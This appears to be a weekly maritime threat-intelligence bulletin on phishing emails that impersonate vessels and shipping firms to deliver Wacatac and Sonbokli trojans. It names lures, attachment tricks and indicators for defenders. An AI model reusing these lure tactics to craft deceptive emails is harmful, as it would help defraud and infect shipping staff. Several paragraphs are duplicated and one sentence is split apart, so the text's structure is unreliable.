Home Digitalisation Maritime Cyber Security & Threats March 2020 Week One

Maritime Cyber Security & Threats March 2020 Week One

Vessel Impersonation Report

Dryad Global’s cyber security partners, Red Sky Alliance, perform weekly queries of  backend databases, identifying all new data containing Motor Vessel (MV) and Motor Tanker (MT) in the subject line of malicious emails.  Email subject line Motor Vessel (MV) or Motor Tanker (MT) keyword usage is a common lure to entice users in the maritime industry to open emails containing malicious attachments.

With our cyber security partner we are providing a weekly list of Motor Vessels where it is observed that the vessel is being impersonated, with associated malicious emails.

The identified emails attempted to deliver malware or phishing links to compromise the vessels and/or parent companies.  Users should be aware of the subject lines used and the email addresses that are attempting to deliver the messages.

In the above collection we see malicious actors attempting to use vessel names to try to spoof companies in the maritime supply chain.  This week we observed a large percentage of these malicious emails attempting to deliver Windows trojan malware, specifically Wacatac malware. Vessel names seen include “MT ATHENIA” and “MV FASKOLD” among others.

An email was observed attempting to impersonate “Twin Logistics” using a subject line of “The Integrated Container Logistics & Supply Chain Services.”  Twin Logistics is a freight and shipping company out of Cambodia.

Analysis reveals that the malicious email was sent from a legitimate domain.  The malicious email appears to be targeting employees at Image Model, which is a model making company based out of Taiwan.  It appears the targeted employee forwarded this malicious email to another employee.  It is unclear if that is the malware spreading itself via malware or if the email was forwarded manually.

The message contains an attached Excel spreadsheet identified by Microsoft as the Trojan:Win32/Wacatac.C!ml malware.[1]  The message body asks the victim to open the attached file to find the PI/BL for the vessel and ETA of the cargo.  However, opening the attachment titled “RQ_0868374pdf.gz” could activate the malware.  Notice that the file name includes “PDF” but the file is actually a malicious GZIP file.

In another example, we see an email attempting to impersonate the vessel “M/V TBN” using the subject line “M/V TBN – URGENT PDA DUMAI”.  The subject line includes “URGENT” which is a common social engineering method to further entice victims to quickly open the email and activate the malware.

The name “TBN” used in the subject line however, there are no legitimate vessels discovered on marinetraffic.com with this name.  The subject line also includes Dumai which is a known port in Indonesia. There are no vessels which have arrived or departed from the port recently with a name similar to “TBN.

An attachment titled “Sider Buffalo ship’s description.doc” is identified by Microsoft AV engine as Trojan:Win32/Sonbokli.A!cl. This malware uses the built-in MS Powershell tool to connect to command and control servers to download additional malware on the victim device.[2]

The message body of the email confirms that the malicious sender is referencing Dumai Port.  There are lot of indicators that the sender of the email is unlikely to be a legitimate sender.  The sender claims the request is regarding a possible cargo of 5,000 metric tons which is a very large load to bring into a port, drawing attention and likely causing the victim to o

In the above collection we see malicious actors attempting to use vessel names to try to spoof companies in the maritime supply chain.  This week we observed a large percentage of these malicious emails attempting to deliver Windows trojan malware, specifically Wacatac malware. Vessel names seen include “MT ATHENIA” and “MV FASKOLD” among others.

An email was observed attempting to impersonate “Twin Logistics” using a subject line of “The Integrated Container Logistics & Supply Chain Services.”  Twin Logistics is a freight and shipping company out of Cambodia.

Analysis reveals that the malicious email was sent from a legitimate domain.  The malicious email appears to be targeting employees at Image Model, which is a model making company based out of Taiwan.  It appears the targeted employee forwarded this malicious email to another employee.  It is unclear if that is the malware spreading itself via malware or if the email was forwarded manually.

The message contains an attached Excel spreadsheet identified by Microsoft as the Trojan:Win32/Wacatac.C!ml malware.[1]  The message body asks the victim to open the attached file to find the PI/BL for the vessel and ETA of the cargo.  However, opening the attachment titled “RQ_0868374pdf.gz” could activate the malware.  Notice that the file name includes “PDF” but the file is actually a malicious GZIP file.

In another example, we see an email attempting to impersonate the vessel “M/V TBN” using the subject line “M/V TBN – URGENT PDA DUMAI”.  The subject line includes “URGENT” which is a common social engineering method to further entice victims to quickly open the email and activate the malware.

The name “TBN” used in the subject line however, there are no legitimate vessels discovered on marinetraffic.com with this name.  The subject line also includes Dumai which is a known port in Indonesia. There are no vessels which have arrived or departed from the port recently with a name similar to “TBN.

An attachment titled “Sider Buffalo ship’s description.doc” is identified by Microsoft AV engine as Trojan:Win32/Sonbokli.A!cl. This malware uses the built-in MS Powershell tool to connect to command and control servers to download additional malware on the victim device.[2]

The message body of the email confirms that the malicious sender is referencing Dumai Port.  There are lot of indicators that the sender of the email is unlikely to be a legitimate sender.  The sender claims the request is regarding a possible cargo of 5,000 metric tons which is a very large load to bring into a port, drawing attention and likely causing the victim to open the attachment quickly.

[1]https://www.virustotal.com/gui/file/ddcac1e814ec478d4b9c268b169a0c3cbee701597f2a2ba68bef1292d5513580/detection

[2] https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/trojan.x97m.powload.usmanfogas

pen the attachment quickly.

[1]https://www.virustotal.com/gui/file/ddcac1e814ec478d4b9c268b169a0c3cbee701597f2a2ba68bef1292d5513580/detection

[2] https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/trojan.x97m.powload.usmanfogas

Typically, the use of language is a good indicator of a spoofed message.  However, in this case, there are other indicators that the sender is illegitimate. They use a generic “Dear Agent” salutation which is common among malicious emails.  Also, the sender email uses a domain based in Gabon, Africa (nugatera[.]ga), even though their name indicates a Hebrew heritage (Nadav), and the phone number listed is registered to Israel (+972 8 6465126).

The Errors in grammar and punctuation can indicate a non-native speaker originated a message.  This is especially indicative when the attacker is trying to impersonate a sender who is expected to fluently speak and write the language.  Overall, the use of language in this message is good, but on close inspection there are punctuation errors, capitalization errors, and slight phrasing issues throughout.

These analyses illustrate how a recipient could be fooled into opening an infected email.  Doing so could cause the recipient to become an infected member of the maritime supply chain and thus possibly infect victim vessels, port facilities and/or shore companies in the marine, agricultural, and other industries with additional malware.

Pre-empt, don’t just defend

Preventative cyber protection offers a strong first-line defense by preventing deceptive messages from ever reaching staff inboxes, but malicious hackers are developing new techniques to evade current detection daily. Using preemptive information from Red Sky Alliance RedXray diagnostic tool, our Vessel Impersonation reports and Maritime Blacklists offer a proactive solution to stopping cyber-attacks. Recent studies suggest cyber-criminals are researching their targets and tailoring emails for staff in specific roles. Another tactic is to spoof emails from the chief executive or other high-ranking maritime contemporaries in the hope staff lower down the supply chain will drop their awareness and follow the spoofed email obediently. Analysts across the industry are beginning to see maritime-specific examples of these attacks.

The more convincing an email appears, the greater the chance employees will fall for a scam.  To address this residual risk, software-based protection should be treated as one constituent of a wider strategy that also encompasses the human-element as well as organizational workflows and procedures.

It is imperative to:

  • Train all levels of the marine supply chain to realize they are under constant cyber-attack.
  • Stress maintaining constant attention to real-world cyber consequences of careless cyber practices or general inattentiveness.
  • Provide practical guidance on how to look for a potential phishing attempt.
  • Use direct communication to verify emails and supply chain email communication.
  • Use Red Sky Alliance RedXray proactive support, our Vessel impersonation information and use the Maritime Black Lists to proactively block cyber attacks from identified malicious actors.

Source: Dryad Global